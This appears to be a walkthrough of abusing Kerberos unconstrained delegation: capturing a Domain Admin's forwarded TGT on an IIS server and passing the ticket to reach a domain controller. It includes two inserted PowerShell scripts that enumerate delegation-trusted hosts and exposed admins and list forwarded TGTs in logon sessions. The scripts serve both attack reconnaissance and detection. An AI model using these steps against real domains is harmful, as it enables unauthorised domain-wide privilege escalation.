User --- authenticates to ---> IIS server ---> authenticates on behalf of the user --->

With unconstrained delegation the user's forwardable TGT travels to the IIS server inside the service ticket, so the IIS server can then authenticate to any other service in the domain as that user, not only to the one the user originally wanted.
IIS01 has the unconstrained Kerberos delegation privilege: its TrustedForDelegation field is set to $true, so it is a valid target for this attack:
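The TrustedForDelegation check above can be done for the whole domain at once. The script below is an added example and not code from the original page: it queries LDAP directly through System.DirectoryServices (no RSAT module required) for non-DC accounts that have the TRUSTED_FOR_DELEGATION bit set, and then lists the protected (adminCount=1) users whose TGT such a host could still capture, i.e. those neither marked "sensitive and cannot be delegated" nor in Protected Users. Domain and account names come from the domain the running machine is joined to; the function names are my own.

```powershell
# Added example, not code from the original page: find non-DC accounts trusted
# for unconstrained delegation, and privileged users whose TGT such a host could
# still capture. Raw LDAP via System.DirectoryServices, so no RSAT module needed.
# Domain, names and OUs are whatever the running machine is joined to.

# userAccountControl bits (ADS_USER_FLAG_ENUM)
$TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation (the IIS01 case)
$SERVER_TRUST_ACCOUNT   = 0x2000     # domain controller accounts: always set, not interesting
$NOT_DELEGATED          = 0x100000   # "Account is sensitive and cannot be delegated"
$BIT_AND = '1.2.840.113556.1.4.803'  # LDAP_MATCHING_RULE_BIT_AND

function Search-Ldap {
    param([string]$Filter, [string[]]$Properties)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.Filter = $Filter
    $searcher.PageSize = 500          # paged results; large domains exceed the default 1000-entry limit
    [void]$searcher.PropertiesToLoad.AddRange($Properties)
    $searcher.FindAll()
}

function Get-UnconstrainedDelegationAccount {
    # TRUSTED_FOR_DELEGATION set, SERVER_TRUST_ACCOUNT clear. Computer *and* user
    # objects match: a user account running a service can be trusted for delegation too.
    $filter = "(&(userAccountControl:${BIT_AND}:=$TRUSTED_FOR_DELEGATION)" +
              "(!(userAccountControl:${BIT_AND}:=$SERVER_TRUST_ACCOUNT)))"
    foreach ($r in Search-Ldap $filter @('samaccountname','dnshostname','objectclass','serviceprincipalname')) {
        [pscustomobject]@{
            SamAccountName = [string]@($r.Properties['samaccountname'])[0]
            DnsHostName    = [string]@($r.Properties['dnshostname'])[0]      # empty for user objects
            ObjectClass    = [string]@($r.Properties['objectclass'])[-1]     # most specific class: computer or user
            SPNs           = @($r.Properties['serviceprincipalname'])
        }
    }
}

function Get-DelegatableAdmin {
    # Accounts protected by AdminSDHolder (adminCount=1 is a heuristic; it can be stale)
    # that are NOT marked sensitive and NOT in Protected Users. Their TGT lands on a
    # host like IIS01 the moment they authenticate to it.
    $filter = "(&(objectCategory=person)(adminCount=1)" +
              "(!(userAccountControl:${BIT_AND}:=$NOT_DELEGATED)))"
    foreach ($r in Search-Ldap $filter @('samaccountname','memberof')) {
        $groups = @($r.Properties['memberof'])
        # -match on an array returns the matching members; empty array => not protected
        if (-not ($groups -match '^CN=Protected Users,')) {
            [pscustomobject]@{
                SamAccountName = [string]@($r.Properties['samaccountname'])[0]
                GroupCount     = $groups.Count
            }
        }
    }
}

Get-UnconstrainedDelegationAccount | Format-Table SamAccountName, ObjectClass, DnsHostName -AutoSize
Get-DelegatableAdmin | Format-Table -AutoSize
```

Run it from any domain-joined machine as a normal domain user; both queries need only read access to the directory. DCs are excluded on purpose because they always carry the flag; the Protected Users check is only meaningful on domains at functional level 2012 R2 or later, where the group exists.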
Note that there is no ticket for offense\administrator (Domain Admin) in memory just yet.
A web request to IIS01 is then issued from the DC01 host in the context of offense\administrator and returns an HTTP 200 OK response:
Monitoring IIS01 for new Kerberos tickets appearing in memory:
Before carrying out the pass-the-ticket attack and becoming a DA, let's PSRemote into IIS01 and check the Kerberos tickets available in the current logon session, just to make sure we do not have DA rights yet:
The IIS01 system now holds a krbtgt ticket (the TGT) for offense\administrator, which lets this session access the DC01 C$ share and establish a PSSession with an interactive shell with Domain Admin privileges:
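The monitoring step and the ticket check above only look at the current logon session. The script below is an added example, not code from the original page: run elevated on the delegating host (for instance inside the PSRemoting session to IIS01) it walks every logon session with klist, and reports TGTs that carry the forwarded flag, which is what distinguishes a TGT delegated to this host from the host's own or an interactive user's merely forwardable TGT. It assumes the English klist.exe output format; account and realm names are whatever is on the box, and the function names are my own.

```powershell
# Added example, not the page's own code: list every logon session on this host
# and report forwarded TGTs cached in any of them, which is exactly what an
# unconstrained-delegation host like IIS01 accumulates. Must run elevated
# (klist cannot read other sessions' caches otherwise). Parsing assumes the
# English klist.exe output format.

function Get-LogonSessionId {
    # klist sessions prints lines like:
    #   "[2] Session 1 0:0x5b8f4 OFFENSE\delegate  Kerberos:Interactive"
    # -> LUID high part (decimal) : low part (hex), account, package:logon type
    klist sessions | ForEach-Object {
        if ($_ -match 'Session\s+\d+\s+(\d+):(0x[0-9a-fA-F]+)\s+(.+?)\s+(\S+:\S+)\s*$') {
            [pscustomobject]@{
                LuidHigh  = [int]$Matches[1]
                LuidLow   = $Matches[2]
                Account   = $Matches[3]
                LogonType = $Matches[4]   # a delegated TGT typically sits in a Kerberos:Network session
            }
        }
    }
}

function Get-DelegatedTgt {
    # Ticket blocks in "klist tickets" look like:
    #   #0>     Client: administrator @ OFFENSE.LOCAL
    #           Server: krbtgt/OFFENSE.LOCAL @ OFFENSE.LOCAL
    #           Ticket Flags 0x60a10000 -> forwardable forwarded renewable ...
    # A TGT that arrived via delegation carries 'forwarded'; a locally obtained one does not.
    foreach ($s in Get-LogonSessionId) {
        $ticket = $null
        $lines = klist -lh $s.LuidHigh -li $s.LuidLow tickets 2>$null
        foreach ($line in $lines) {
            if ($line -match '^\s*#\d+>\s+Client:\s+(.+)$') {
                $ticket = @{ Client = $Matches[1].Trim() }
            } elseif ($ticket -and $line -match '^\s+Server:\s+(.+)$') {
                $ticket.Server = $Matches[1].Trim()
            } elseif ($ticket -and $line -match '^\s+Ticket Flags\s+(0x[0-9a-fA-F]+)\s+->\s+(.+)$') {
                $flags = $Matches[2].Trim()
                if ($ticket.Server -like 'krbtgt/*' -and $flags -match '\bforwarded\b') {
                    [pscustomobject]@{
                        Session   = $s.LuidLow
                        LogonType = $s.LogonType
                        Client    = $ticket.Client
                        Server    = $ticket.Server
                        Flags     = $flags
                    }
                }
                $ticket = $null   # flags line closes the block
            }
        }
    }
}

function Watch-DelegatedTgt {
    # Poll and print each delegated TGT once, keyed by session and client principal.
    param([int]$IntervalSeconds = 5)
    $seen = @{}
    while ($true) {
        foreach ($t in Get-DelegatedTgt) {
            $key = "$($t.Session)|$($t.Client)"
            if (-not $seen.ContainsKey($key)) {
                $seen[$key] = $true
                Write-Host ("[{0:HH:mm:ss}] delegated TGT for {1} in session {2} ({3})" -f (Get-Date), $t.Client, $t.Session, $t.LogonType)
            }
        }
        Start-Sleep -Seconds $IntervalSeconds
    }
}

Get-DelegatedTgt | Format-Table Session, LogonType, Client, Server -AutoSize
```

Call Watch-DelegatedTgt instead of the final one-shot listing to keep polling while the Domain Admin's request comes in. klist only shows the tickets LSA exposes; it does not export the ticket bytes, so the pass-the-ticket step itself still needs a tool that extracts the TGT from the session, and the same flag is what a defender can alert on when it appears in a session on a non-DC host.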
Any Kerberos-authenticated access to IIS01 has the same effect, unless the account is marked "sensitive and cannot be delegated" or is a member of Protected Users. Here offense\delegate accesses a share on IIS01 and that user's TGT gets cached on IIS01 too: